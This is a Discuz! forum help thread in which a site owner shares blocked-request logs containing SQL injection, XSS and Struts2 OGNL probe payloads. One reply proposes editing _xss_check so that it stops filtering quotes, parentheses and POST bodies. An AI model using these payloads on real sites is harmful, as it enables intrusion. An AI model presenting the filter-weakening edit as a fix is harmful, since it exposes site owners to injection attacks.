Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[求助] 每天都一个IP段 5点-8点刷网站时间短 页面多 是不是黑客,大家能帮忙看看吗?

[复制链接]
≮麦农≯ 发表于 2016-7-24 10:05:59 | 显示全部楼层 |阅读模式


时间 内容
2016-07-24 08:25:10 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:search.php:0022 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0355 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /search.php?searchsubmit=yes

2016-07-24 08:23:55 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:search.php:0022 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.162; RIP:180.97.106.162 Request: /search.php?mod=mod.%28.%5D%2C%27%28%2C%29%28&srchtxt=&searchsubmit=yes

2016-07-24 08:23:32 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:portal.php:0018 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /portal.php?struts&(a)(('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(z))&(b)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(z))&(c)(('\u0023_memberAccess.excludeProperties\u003d{}')(z))&(d)(('\u0023a_str\u003d\'814F60BD-F6DF-4227-\'')(z))&(e)(('\u0023b_str\u003d\'86F5-8D9FBF26A2EB\'')(z))&(n)(('\u0023a_resp\u003d@org.apache.struts2.ServletActionContext@getResponse()')(z))&(o)(('\u0023a_resp.getWriter().println(\u0023a_str\u002B\u0023b_str)')(z))&(p)(('\u0023a_resp.getWriter().flush()')(z))&(q)(('\u0023a_resp.getWriter().close()')(z))

2016-07-24 08:23:19 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:plugin.php:0021 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /plugin.php?id=wechat:login%3Cimg%20src=1%20onerror=alert(1)%3E

2016-07-24 08:22:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /misc.php?mod=seccode&update=61445%27%20AND%20%28SELECT%201713%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6575693a%2C%28SELECT%20%28CASE%20WHEN%20%281713%3D1713%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a626c7a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20%20AND%20%27Ghxz%27%3D%27Ghxz&idhash=cSYOscnz

2016-07-24 08:12:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.162; RIP:180.97.106.162 Request: /misc.php?mod=seccode%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20&action=update&idhash=cSrj00U4&0.5170849768910557&modid=forum%3A%3Aforumdisplay

2016-07-24 08:02:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /misc.php?action=update&0.6029497748240829=&idhash=cSlgYgqV&modid=undefined&mod=alert(1)//

2016-07-24 07:52:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /misc.php?mod=seccode&action=update&idhash=cSa1143f&0.008099353406578302&modid=undefined%29%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23

2016-07-24 07:52:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /misc.php?mod=seccode&action=update&idhash=-5854%27%20UNION%20ALL%20SELECT%201521%2C%201521%2C%201521%2C%201521%2C%201521%23&0.008099353406578302&modid=undefined

2016-07-24 07:42:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /misc.php?mod=seccode&action=-3089%22%20UNION%20ALL%20SELECT%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987%2C%208987--%20&idhash=cSS9r2pi&0.31725194747559726&modid=undefined

2016-07-24 07:32:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /misc.php?mod=seccode%25%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23&action=update&idhash=cSRF2ss3&0.25544706685468554&modid=undefined

2016-07-24 07:22:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.162; RIP:180.97.106.162 Request: /misc.php?action=update&idhash=cSC2J5i2&class.classLoader.jarPath=(%23context%5B%5C%22xwork.MethodAccessor.denyMethodExecution%5C%22%5D=new%20java.lang.Boolean%28false%29%2C%23_memberAccess%5B%5C%22allowStaticMethodAccess%5C%22%5D=new%20java.lang.Boolean%28true%29%2C%23_memberAccess.excludeProperties=%7B%7D%2C%23a_str=%27814F60BD-F6DF-4227-%27%2C%23b_str=%2786F5-8D9FBF26A2EB%27%2C%23a_resp=%40org.apache.struts2.ServletActionContext%40getResponse%28%29%2C%23a_resp.getWriter%28%29.println%28%23a_str%2B%23b_str%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29)(meh)&z[(class.classLoader.jarPath)('meh')]=true&mod=seccode

2016-07-24 07:15:17 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /member.php?mod=-2817%25%27%20UNION%20ALL%20SELECT%203264%2C%203264%2C%203264%23

2016-07-24 07:12:30 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:misc.php:0093 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /misc.php?mod=mobile%3Cimg%20src=1%20onerror=alert(1)%3E

2016-07-24 07:11:51 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0355 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.161; RIP:180.97.106.161 Request: /member.php?mod=lostpasswd&lostpwsubmit=yes&infloat=yes

2016-07-24 07:11:51 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0355 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /member.php

2016-07-24 07:05:17 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.162; RIP:180.97.106.162 Request: /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1

2016-07-24 07:01:51 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0355 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /member.php?action=login&loginhash=LjWq8&loginsubmit=yes&inajax=1&mod=logging

2016-07-24 06:55:17 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /member.php?mod=logging&action=login&loginsubmit=yes%25%27%29%20AND%20UPDATEXML%282210%2CCONCAT%280x2e%2C0x3a6c776b3a%2C%28SELECT%20%28CASE%20WHEN%20%282210%3D2210%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a656b713a%29%2C8219%29%20%20AND%20%28%27%25%27%3D%27&infloat=yes&lssubmit=yes&inajax=1

2016-07-24 06:45:17 您当前的访问请求当中含有非法字符,已经被系统拒绝
PHP:member.php:0026 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0552 -> source/class/discuz/discuz_application.php:0370 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024
User: uid=0; IP=180.97.106.37; RIP:180.97.106.37 Request: /member.php?inajax=1&loginsubmit=yes&frommessage=&action=login&loginhash=LNUL7&mod=logging  


网站用百度开放云,流量按后付费,每天流量用的心疼。

现在是禁止180.97.106.*这个IP段的访问 这样能解决问题吗?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
baiyangwz 发表于 2016-7-24 15:40:35 | 显示全部楼层
可能是黑客
回复

使用道具 举报

allthebest 发表于 2016-7-24 17:26:52 | 显示全部楼层


打开:

\source\class\discuz的discuz_application.php查找

private function _xss_check() {


                static $check = array('"', '>', '<', '\'', '(', ')', 'CONTENT-TRANSFER-ENCODING');


                if(isset($_GET['formhash']) && $_GET['formhash'] !== formhash()) {

                        system_error('request_tainting');

                }


                if($_SERVER['REQUEST_METHOD'] == 'GET' ) {

                        $temp = $_SERVER['REQUEST_URI'];

                } elseif(empty ($_GET['formhash'])) {

                        $temp = $_SERVER['REQUEST_URI'].file_get_contents('php://input');

                } else {

                        $temp = '';

                }


                if(!empty($temp)) {

                        $temp = strtoupper(urldecode(urldecode($temp)));

                        foreach ($check as $str) {

                                if(strpos($temp, $str) !== false) {

                                        system_error('request_tainting');

                                }

                        }

                }


                return true;


修改为:


private function _xss_check() {

                $temp = strtoupper(urldecode(urldecode($_SERVER['REQUEST_URI'])));

                if(strpos($temp, '<') !== false || strpos($temp, '"') !== false || strpos($temp, 'CONTENT-TRANSFER-ENCODING') !== false) {

                        system_error('request_tainting');

                }

                return true;

        }

2 登陆FTP,替换同名文件,故障解决


END
回复

使用道具 举报

z110110 发表于 2016-7-25 07:51:40 | 显示全部楼层
这个是不是什么HK...
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-23 04:28 , Processed in 0.023939 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表